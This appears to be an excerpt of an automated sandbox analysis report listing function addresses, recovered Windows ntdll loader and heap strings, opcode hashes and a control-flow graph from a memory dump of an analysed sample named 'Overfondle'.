                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: 9e27c03d4561828750c24612ce41ec863e50c4ecea7a4c84738a37d89d078ab0
                                                                        • Instruction ID: e353e99c0469d5b065e01f312acaeab593d19b0c4ef0ff73be6b72d0566d8d78
                                                                        • Opcode Fuzzy Hash: 9e27c03d4561828750c24612ce41ec863e50c4ecea7a4c84738a37d89d078ab0
                                                                        • Instruction Fuzzy Hash: 6E0242B2D002289BDB21CF94CD90BDDB7B8AF55714F4081EAEA08A7241D7399F85CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20508B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1486 20508b42-20508bba GetPEB call 20460750 1489 20508bc0-20508bde call 20464390 1486->1489 1490 20508d12-20508d1a 1486->1490 1495 20508be0-20508bf9 call 204a7bb0 1489->1495 1496 20508bff-20508c07 1489->1496 1492 20508d1b-20508d30 call 204a4c30 1490->1492 1495->1490 1495->1496 1499 20508c37-20508c40 1496->1499 1500 20508c09-20508c1e call 20494ff1 1496->1500 1499->1490 1501 20508c46-20508c48 1499->1501 1500->1490 1507 20508c24-20508c2c 1500->1507 1501->1492 1504 20508c4e-20508c5c 1501->1504 1506 20508c68-20508c6e 1504->1506 1508 20508c70 1506->1508 1509 20508c5e-20508c62 1506->1509 1507->1490 1510 20508c32 1507->1510 1513 20508ccf-20508cf5 call 20494f30 1508->1513 1511 20508c72-20508c74 1509->1511 1512 20508c64-20508c65 1509->1512 1510->1492 1511->1513 1515 20508c76-20508c7f 1511->1515 1512->1506 1513->1492 1518 20508cf7-20508d10 call 204a7bb0 1513->1518 1515->1513 1517 20508c81-20508c83 1515->1517 1519 20508c87-20508c9b call 204a7bb0 1517->1519 1518->1490 1518->1492 1524 20508cb9 1519->1524 1525 20508c9d 1519->1525 1526 20508cbd-20508ccd 1524->1526 1527 20508ca0-20508ca9 1525->1527 1526->1513 1526->1519 1527->1527 1528 20508cab-20508cb5 1527->1528 1528->1490 1529 20508cb7 1528->1529 1529->1526
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 47171151af9620a26b69c4bfbd99749c5654afc58a49f4360097a365706ed4ca
                                                                        • Instruction ID: 8dae927b99a32bc27f1a7033ab025f4e6c202df35d4129effdd0f7279b5bc36b
                                                                        • Opcode Fuzzy Hash: 47171151af9620a26b69c4bfbd99749c5654afc58a49f4360097a365706ed4ca
                                                                        • Instruction Fuzzy Hash: 3D51C0711043059BD724CB948884FAFBBE9FF98754F248A1EF9D486680E778DA04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2046EA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`VC ${
                                                                        • API String ID: 0-2535458381
                                                                        • Opcode ID: 20aae4777a3c8b806860f57d6afe0dc03a08f5d8fd5bd1537256a97a266edd02
                                                                        • Instruction ID: b1a23b7bbe5f806dec87a050a5c835e68b1d4ec135df165ca14734540f16935b
                                                                        • Opcode Fuzzy Hash: 20aae4777a3c8b806860f57d6afe0dc03a08f5d8fd5bd1537256a97a266edd02
                                                                        • Instruction Fuzzy Hash: FEA26D74A05629CFDB64CF95CD98B99B7B1AF85304F6082E9D94CA7350EB389E81CF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • VerifierFlags, xrefs: 204E8C50
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 204E8A67
                                                                        • VerifierDlls, xrefs: 204E8CBD
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 204E8B8F
                                                                        • VerifierDebug, xrefs: 204E8CA5
                                                                        • HandleTraces, xrefs: 204E8C8F
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 204E8A3D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: cc75e84998e26e42122264e7fab5c6c262ca18a8ff5cb2b73bfae74c138178d4
                                                                        • Instruction ID: 508207d00e635317bca1a55c0559bd72c3a6eab07725a5e8cc096b52f69452cc
                                                                        • Opcode Fuzzy Hash: cc75e84998e26e42122264e7fab5c6c262ca18a8ff5cb2b73bfae74c138178d4
                                                                        • Instruction Fuzzy Hash: 85912371905710AFDB11CFE9CC90F0A7BA5ABA4B19F50C55DFA4C6B6A0C73CAC048792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2048245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204CA9A2
                                                                        • TGC , xrefs: 20482462
                                                                        • LdrpDynamicShimModule, xrefs: 204CA998
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 204CA992
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGC $minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-3721819398
                                                                        • Opcode ID: bae866839d8d2e93a20f5bfd863e9eb0a761bd5753af281c187f513e085dfba8
                                                                        • Instruction ID: 4f091a6ce1cd26570b4f1789048c9c9fb07d5bdfe3422abe71a096ec828dad0e
                                                                        • Opcode Fuzzy Hash: bae866839d8d2e93a20f5bfd863e9eb0a761bd5753af281c187f513e085dfba8
                                                                        • Instruction Fuzzy Hash: DC3127B5A00601ABD7119FD98D85F5ABBF4FB94B08F21841AF80067261D77C5D92E790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: f9323da754dcda410a52c0ff8eb06da3454237d5329db8d3029335f72d5d0d2e
                                                                        • Instruction ID: f610078630477824450cadd141428f85657fbe26f4b0ee87746924c86c8baeb1
                                                                        • Opcode Fuzzy Hash: f9323da754dcda410a52c0ff8eb06da3454237d5329db8d3029335f72d5d0d2e
                                                                        • Instruction Fuzzy Hash: DD917472A006999BD718CFD4CDA5B8E3FA0BB90B68F50C16DF9006B391D73C9941DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20492674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 204D21BF
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 204D219F
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 204D2160, 204D219A, 204D21BA
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 204D2178
                                                                        • SXS: %s() passed the empty activation context, xrefs: 204D2165
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 204D2180
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 7cf7445cd1e7bb2e8e3b49d5f57069583da25a89d2f2eca1c0bd9d4e8fa9715b
                                                                        • Instruction ID: a20fc754788ed3765bc99f36a67a3c587a8c314102989b5809b968cef55a02df
                                                                        • Opcode Fuzzy Hash: 7cf7445cd1e7bb2e8e3b49d5f57069583da25a89d2f2eca1c0bd9d4e8fa9715b
                                                                        • Instruction Fuzzy Hash: BB310472E0012877F7118AD59D90F5F7B78EBA5A84F01C0A9FF04BB344D2389E02C6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2049C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 2049C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 204D81E5
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 204D8181, 204D81F5
                                                                        • LdrpInitializeProcess, xrefs: 2049C6C4
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 204D8170
                                                                        • LdrpInitializeImportRedirection, xrefs: 204D8177, 204D81EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: ed6b7513fc2fa4275f0c26728ca14fd00f58e254a944f58d03b6bb0e5af9edb7
                                                                        • Instruction ID: 6fad92102c24518bba2f7fc06e829afb28ba762cc0be91c26dc7657628d0c47d
                                                                        • Opcode Fuzzy Hash: ed6b7513fc2fa4275f0c26728ca14fd00f58e254a944f58d03b6bb0e5af9edb7
                                                                        • Instruction Fuzzy Hash: 69310672604705ABC214DFA8DD86F1A7BD5EFD4F58F00896CF8446B391D628DD04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20470770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: de171eba1fe5646269d5537b0c3405a8d3886acdcd1ec17377492d7e3ca42110
                                                                        • Instruction ID: f85a95858f70240e774761ec47f6393faf3ddaa35c1e0cca5d6d9d5ddcadc9ea
                                                                        • Opcode Fuzzy Hash: de171eba1fe5646269d5537b0c3405a8d3886acdcd1ec17377492d7e3ca42110
                                                                        • Instruction Fuzzy Hash: D3F17A74A01605DFDB14CFA8C884BAAB7F5FB44704F24C1A8E5059B3A2D738EE81CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20480BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204CA121
                                                                        • LdrpCheckModule, xrefs: 204CA117
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 204CA10F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-161242083
                                                                        • Opcode ID: 9ff35f7010efdfd13ace1e13ccc2d98ca61db398b17d6cbdf7da6d58b833339c
                                                                        • Instruction ID: d30dd3b759153ac7735b86a703b3f72ea4e2bd76110917dc6472b86654e0e3e0
                                                                        • Opcode Fuzzy Hash: 9ff35f7010efdfd13ace1e13ccc2d98ca61db398b17d6cbdf7da6d58b833339c
                                                                        • Instruction Fuzzy Hash: D071BE75A006059FCB08DFE8CD81BAEBBF4EB54608F14862DE4019B311E73CAE42DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2049C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 204D82DE
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204D82E8
                                                                        • Failed to reallocate the system dirs string !, xrefs: 204D82D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-1783798831
                                                                        • Opcode ID: e0c307f285d555de7e6bfe9d6f64955563bc22efd027e7a56a112a5b42306e2a
                                                                        • Instruction ID: c2a9949d5280c5e03ed0509262dbe492fb589e738b2018bc85bbaddb740d3156
                                                                        • Opcode Fuzzy Hash: e0c307f285d555de7e6bfe9d6f64955563bc22efd027e7a56a112a5b42306e2a
                                                                        • Instruction Fuzzy Hash: 5441B272504705EBC710DBE8CD85B5B7BE8EB68A54F00C96EB94897260E77CE9009B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204E4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 204E4888
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 204E4899
                                                                        • LdrpCheckRedirection, xrefs: 204E488F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 3446177414-3154609507
                                                                        • Opcode ID: fd1edee06f0c2530ec6a34880404b49f9040e8c5129a4fcc9fae91e7fb8cf977
                                                                        • Instruction ID: 7e7b6b1915373078cac55ba2c0a9ae9a6bc4d15f16b98297eabb07e039e34f8e
                                                                        • Opcode Fuzzy Hash: fd1edee06f0c2530ec6a34880404b49f9040e8c5129a4fcc9fae91e7fb8cf977
                                                                        • Instruction Fuzzy Hash: 2841CD36A046508BCB21DFAAC840E167BE5FFCDA52F528569ED8C97351D338DC00DB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 204A2DF0: LdrInitializeThunk.NTDLL ref: 204A2DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 204A0D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 13d6b31091cc1c4e10a257b637e0cbb645132b461c861462f3e28a05f9746c5b
                                                                        • Instruction ID: 938bfb96922863259f82ef4064441ae9c5d31cabae7a2dfea747051cafec6fb6
                                                                        • Opcode Fuzzy Hash: 13d6b31091cc1c4e10a257b637e0cbb645132b461c861462f3e28a05f9746c5b
                                                                        • Instruction Fuzzy Hash: 8F428C72900714DFDB20CFA8C891B9AB7F4BF18304F1485A9E989DB345E774AA85CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2053B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 6f15e889c9978bdebbe002dfcc72108c29eb15cbed16349157395c415de84914
                                                                        • Instruction ID: 0cdaa70b7df08f8bc324e64e4dfacff839e6b8a23b65990c9861016150fece7d
                                                                        • Opcode Fuzzy Hash: 6f15e889c9978bdebbe002dfcc72108c29eb15cbed16349157395c415de84914
                                                                        • Instruction Fuzzy Hash: 7CF10972E009158BDB08DFA9C99167EFFF6EF98200B19426DD556DB381E634EE01CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204604E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2046063D
                                                                        • kLsE, xrefs: 20460540
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 3446177414-2547482624
                                                                        • Opcode ID: ef6ab05c9c10e5671ff82748d780b9ceb8ab1b6c74dfdda7ae71650dd30d749b
                                                                        • Instruction ID: 5b70b12b3baeab8e7768783864e9df6b5112cc7569b8a3d64f4f094501f2c890
                                                                        • Opcode Fuzzy Hash: ef6ab05c9c10e5671ff82748d780b9ceb8ab1b6c74dfdda7ae71650dd30d749b
                                                                        • Instruction Fuzzy Hash: AB517C715047429BC324DFA4C580797B7E5AF84704F10C83EEAAA87241F778EA55CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2046A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 1d7deee30538078084d265e019c0ebc1a3ef456e7a4c4b52e5dc96c7225b0f23
                                                                        • Instruction ID: 03283beb351f15bfd5ec716d042c41cd21ef5258a89c65bdd99ff39a317b72f7
                                                                        • Opcode Fuzzy Hash: 1d7deee30538078084d265e019c0ebc1a3ef456e7a4c4b52e5dc96c7225b0f23
                                                                        • Instruction Fuzzy Hash: 83C158741087829FC711CF94C540B5AB7E4BF84B08F10896AF9968B351E7BCDA96CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20498402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
